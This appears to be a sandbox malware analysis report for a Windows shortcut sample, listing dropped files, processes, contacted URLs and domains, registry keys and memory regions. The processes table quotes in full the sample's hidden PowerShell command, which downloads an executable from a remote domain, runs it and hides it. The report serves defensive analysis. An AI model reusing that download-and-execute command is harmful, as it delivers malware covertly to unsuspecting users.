Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Transfer.lnk
|
MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=0,
ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
|
initial sample
|
 |
|
|
C:\Users\user\Desktop\Ojtjewi.exe
|
HTML document, ASCII text, with very long lines (394)
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5p2k5aav.tbb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kuprr5lv.pbb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y4kgkxyt.ysq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zra3zqfc.o5q.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8N3V4ZHDK5OW1T8YIYRZ.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\cec517aed817c91b.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Windows\appcompat\Programs\Amcache.hve
|
MS Windows registry file, NT/2000 or above
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hiDdEn Hiddden -Command OpenWith.exe;(new-object
System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/jlow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.exe','Ojtjewi.exe');./'Ojtjewi.exe';(get-item
'Ojtjewi.exe').Attributes += 'Hidden';
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://www.sodiumlaurethsulfatedesyroyer.com/jlow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.exe
|
188.114.97.3
|
|
|
|
https://www.sodiumlaurethsulfatedesyroyer.com/jlow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrg
|
unknown
|
|
|
|
https://www.sodiumlaurethsulfatedesyroyer.com
|
unknown
|
|
|
|
https://www.cloudflare.com/learning/access-management/phishing-attack/
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://www.sodiumlaurethsulfatedesyroyer.com
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://www.microsoft.co
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://aka.ms/winsvr-2022-pshelpX
|
unknown
|
||
|
https://www.sodiumlaurethsulfatedesyroyer.com/ow
|
unknown
|
||
|
http://upx.sf.net
|
unknown
|
||
|
https://www.sodiumlaurethsulfatedesyroyer.com/e
|
unknown
|
||
|
http://go.micros
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.cloudflare.com/5xx-error-landing
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
There are 16 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
www.sodiumlaurethsulfatedesyroyer.com
|
188.114.97.3
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
188.114.97.3
|
www.sodiumlaurethsulfatedesyroyer.com
|
European Union
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7FFB4B2AC000
|
trusted library allocation
|
page execute and read and write
|
||
|
D23397E000
|
stack
|
page read and write
|
||
|
7FFB4B690000
|
trusted library allocation
|
page read and write
|
||
|
2AB39AA0000
|
heap
|
page read and write
|
||
|
7FFB4B306000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B5BC000
|
trusted library allocation
|
page read and write
|
||
|
D234E8E000
|
stack
|
page read and write
|
||
|
7FFB4B253000
|
trusted library allocation
|
page execute and read and write
|
||
|
2AB4BC66000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B30C000
|
trusted library allocation
|
page execute and read and write
|
||
|
2AB3B4A0000
|
heap
|
page readonly
|
||
|
2AB3B971000
|
trusted library allocation
|
page read and write
|
||
|
2AB3992A000
|
heap
|
page read and write
|
||
|
7FFB4B710000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B580000
|
trusted library allocation
|
page read and write
|
||
|
2AB53B59000
|
heap
|
page read and write
|
||
|
D23433C000
|
stack
|
page read and write
|
||
|
D2338F6000
|
stack
|
page read and write
|
||
|
7FFB4B704000
|
trusted library allocation
|
page read and write
|
||
|
2AB39970000
|
heap
|
page read and write
|
||
|
2AB398C8000
|
heap
|
page read and write
|
||
|
2AB53E79000
|
heap
|
page read and write
|
||
|
7FFB4B440000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B6C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B4F0000
|
trusted library allocation
|
page read and write
|
||
|
2AB53B27000
|
heap
|
page execute and read and write
|
||
|
2AB39B35000
|
heap
|
page read and write
|
||
|
7FFB4B470000
|
trusted library allocation
|
page read and write
|
||
|
2AB4BC57000
|
trusted library allocation
|
page read and write
|
||
|
D2343BE000
|
stack
|
page read and write
|
||
|
D234F0E000
|
stack
|
page read and write
|
||
|
7FFB4B300000
|
trusted library allocation
|
page read and write
|
||
|
D2342BE000
|
stack
|
page read and write
|
||
|
7FFB4B640000
|
trusted library allocation
|
page read and write
|
||
|
2AB3CB1C000
|
trusted library allocation
|
page read and write
|
||
|
2AB3D6C5000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B500000
|
trusted library allocation
|
page read and write
|
||
|
2AB39BD0000
|
heap
|
page read and write
|
||
|
2AB4B991000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B643000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B310000
|
trusted library allocation
|
page execute and read and write
|
||
|
7DF425570000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B370000
|
trusted library allocation
|
page execute and read and write
|
||
|
2AB3D474000
|
trusted library allocation
|
page read and write
|
||
|
2AB53D67000
|
heap
|
page read and write
|
||
|
2AB3C2F4000
|
trusted library allocation
|
page read and write
|
||
|
2AB53E70000
|
heap
|
page read and write
|
||
|
2AB53BAC000
|
heap
|
page read and write
|
||
|
2AB3B490000
|
trusted library allocation
|
page read and write
|
||
|
2AB3CFA0000
|
trusted library allocation
|
page read and write
|
||
|
2AB53C2C000
|
heap
|
page read and write
|
||
|
2AB53E5B000
|
heap
|
page read and write
|
||
|
2AB3D5E3000
|
trusted library allocation
|
page read and write
|
||
|
D233DFB000
|
stack
|
page read and write
|
||
|
2AB53B5C000
|
heap
|
page read and write
|
||
|
D23403F000
|
stack
|
page read and write
|
||
|
2AB3D779000
|
trusted library allocation
|
page read and write
|
||
|
2AB54190000
|
heap
|
page read and write
|
||
|
2AB53C30000
|
heap
|
page read and write
|
||
|
2AB53D3B000
|
heap
|
page read and write
|
||
|
2AB4B971000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B5A0000
|
trusted library allocation
|
page read and write
|
||
|
2AB3D3EA000
|
trusted library allocation
|
page read and write
|
||
|
D234F8D000
|
stack
|
page read and write
|
||
|
7FFB4B6B0000
|
trusted library allocation
|
page read and write
|
||
|
2AB53E6D000
|
heap
|
page read and write
|
||
|
2AB53D83000
|
heap
|
page read and write
|
||
|
2AB3D918000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B5E0000
|
trusted library allocation
|
page read and write
|
||
|
2AB39942000
|
heap
|
page read and write
|
||
|
2AB39924000
|
heap
|
page read and write
|
||
|
2AB53E89000
|
heap
|
page read and write
|
||
|
7FFB4B530000
|
trusted library allocation
|
page read and write
|
||
|
2AB4B9A1000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B4D0000
|
trusted library allocation
|
page read and write
|
||
|
2AB3BF5E000
|
trusted library allocation
|
page read and write
|
||
|
2AB53BAA000
|
heap
|
page read and write
|
||
|
7FFB4B540000
|
trusted library allocation
|
page read and write
|
||
|
2AB3D45F000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B4A0000
|
trusted library allocation
|
page read and write
|
||
|
2AB4B9DE000
|
trusted library allocation
|
page read and write
|
||
|
2AB53B20000
|
heap
|
page execute and read and write
|
||
|
2AB3C308000
|
trusted library allocation
|
page read and write
|
||
|
D23443B000
|
stack
|
page read and write
|
||
|
2AB3996A000
|
heap
|
page read and write
|
||
|
D234139000
|
stack
|
page read and write
|
||
|
D2341B8000
|
stack
|
page read and write
|
||
|
7FFB4B490000
|
trusted library allocation
|
page read and write
|
||
|
2AB39A80000
|
heap
|
page read and write
|
||
|
D233EFE000
|
stack
|
page read and write
|
||
|
7FFB4B5D0000
|
trusted library allocation
|
page read and write
|
||
|
2AB53C0A000
|
heap
|
page read and write
|
||
|
2AB3D6E3000
|
trusted library allocation
|
page read and write
|
||
|
2AB3D488000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B460000
|
trusted library allocation
|
page read and write
|
||
|
2AB39AE0000
|
heap
|
page read and write
|
||
|
2AB3CC8A000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B583000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B401000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B5A4000
|
trusted library allocation
|
page read and write
|
||
|
2AB53C13000
|
heap
|
page read and write
|
||
|
2AB3B960000
|
heap
|
page execute and read and write
|
||
|
2AB53D30000
|
heap
|
page read and write
|
||
|
2AB39899000
|
heap
|
page read and write
|
||
|
7FFB4B702000
|
trusted library allocation
|
page read and write
|
||
|
2AB3C2D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B420000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B40A000
|
trusted library allocation
|
page read and write
|
||
|
2AB53975000
|
heap
|
page read and write
|
||
|
D233D7E000
|
stack
|
page read and write
|
||
|
2AB53B30000
|
heap
|
page read and write
|
||
|
7FFB4B26B000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B4B0000
|
trusted library allocation
|
page read and write
|
||
|
2AB3992C000
|
heap
|
page read and write
|
||
|
7FFB4B520000
|
trusted library allocation
|
page read and write
|
||
|
2AB3B8E0000
|
trusted library allocation
|
page read and write
|
||
|
D233E7E000
|
stack
|
page read and write
|
||
|
7FFB4B680000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B254000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B450000
|
trusted library allocation
|
page read and write
|
||
|
2AB3CBAD000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B4C0000
|
trusted library allocation
|
page read and write
|
||
|
D234E0F000
|
stack
|
page read and write
|
||
|
7FFB4B650000
|
trusted library allocation
|
page read and write
|
||
|
2AB3B560000
|
heap
|
page read and write
|
||
|
7FFB4B260000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B336000
|
trusted library allocation
|
page execute and read and write
|
||
|
D2339FE000
|
stack
|
page read and write
|
||
|
2AB3B500000
|
heap
|
page read and write
|
||
|
D233CFD000
|
stack
|
page read and write
|
||
|
7DF425560000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B3F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B5B0000
|
trusted library allocation
|
page read and write
|
||
|
D233F7A000
|
stack
|
page read and write
|
||
|
2AB53EB3000
|
heap
|
page read and write
|
||
|
D2340B6000
|
stack
|
page read and write
|
||
|
2AB53F28000
|
heap
|
page read and write
|
||
|
2AB53DAD000
|
heap
|
page read and write
|
||
|
2AB3C6F5000
|
trusted library allocation
|
page read and write
|
||
|
2AB53E9D000
|
heap
|
page read and write
|
||
|
7FFB4B510000
|
trusted library allocation
|
page read and write
|
||
|
D23423E000
|
stack
|
page read and write
|
||
|
7FFB4B550000
|
trusted library allocation
|
page read and write
|
||
|
2AB3BB99000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B5C0000
|
trusted library allocation
|
page read and write
|
||
|
2AB4BC5E000
|
trusted library allocation
|
page read and write
|
||
|
2AB3C2E3000
|
trusted library allocation
|
page read and write
|
||
|
7DF425580000
|
trusted library allocation
|
page execute and read and write
|
||
|
2AB39890000
|
heap
|
page read and write
|
||
|
2AB4BC5C000
|
trusted library allocation
|
page read and write
|
||
|
2AB3C2CA000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B252000
|
trusted library allocation
|
page read and write
|
||
|
2AB3D4CD000
|
trusted library allocation
|
page read and write
|
||
|
2AB3B930000
|
heap
|
page execute and read and write
|
||
|
2AB39921000
|
heap
|
page read and write
|
||
|
2AB53DBE000
|
heap
|
page read and write
|
||
|
2AB53E65000
|
heap
|
page read and write
|
||
|
2AB3992E000
|
heap
|
page read and write
|
||
|
2AB3B4B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B570000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B270000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B670000
|
trusted library allocation
|
page read and write
|
||
|
2AB3B8B0000
|
trusted library allocation
|
page read and write
|
||
|
2AB39BD5000
|
heap
|
page read and write
|
||
|
2AB53E01000
|
heap
|
page read and write
|
||
|
2AB3B460000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B25D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2AB3D6F2000
|
trusted library allocation
|
page read and write
|
||
|
2AB3C022000
|
trusted library allocation
|
page read and write
|
||
|
2AB53F06000
|
heap
|
page read and write
|
||
|
2AB53C50000
|
heap
|
page read and write
|
||
|
7FFB4B6E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B5B8000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B4E0000
|
trusted library allocation
|
page read and write
|
||
|
2AB53DBA000
|
heap
|
page read and write
|
||
|
7FFB4B6B8000
|
trusted library allocation
|
page read and write
|
||
|
2AB3B9F9000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B432000
|
trusted library allocation
|
page read and write
|
||
|
2AB53B10000
|
trusted library allocation
|
page read and write
|
||
|
2AB3C703000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B560000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B5A9000
|
trusted library allocation
|
page read and write
|
||
|
2AB399A0000
|
heap
|
page read and write
|
||
|
2AB3D916000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B480000
|
trusted library allocation
|
page read and write
|
||
|
2AB3C2F0000
|
trusted library allocation
|
page read and write
|
||
|
2AB53BD5000
|
heap
|
page read and write
|
||
|
7FFB4B660000
|
trusted library allocation
|
page read and write
|
||
|
2AB53E75000
|
heap
|
page read and write
|
||
|
2AB53EC0000
|
heap
|
page read and write
|
||
|
2AB53ED8000
|
heap
|
page read and write
|
||
|
7FFB4B6A0000
|
trusted library allocation
|
page read and write
|
||
|
D233C7E000
|
stack
|
page read and write
|
||
|
7FFB4B410000
|
trusted library allocation
|
page execute and read and write
|
||
|
D233FF9000
|
stack
|
page read and write
|
||
|
2AB39B30000
|
heap
|
page read and write
|
||
|
2AB3CADF000
|
trusted library allocation
|
page read and write
|
There are 187 hidden memdumps, click here to show them.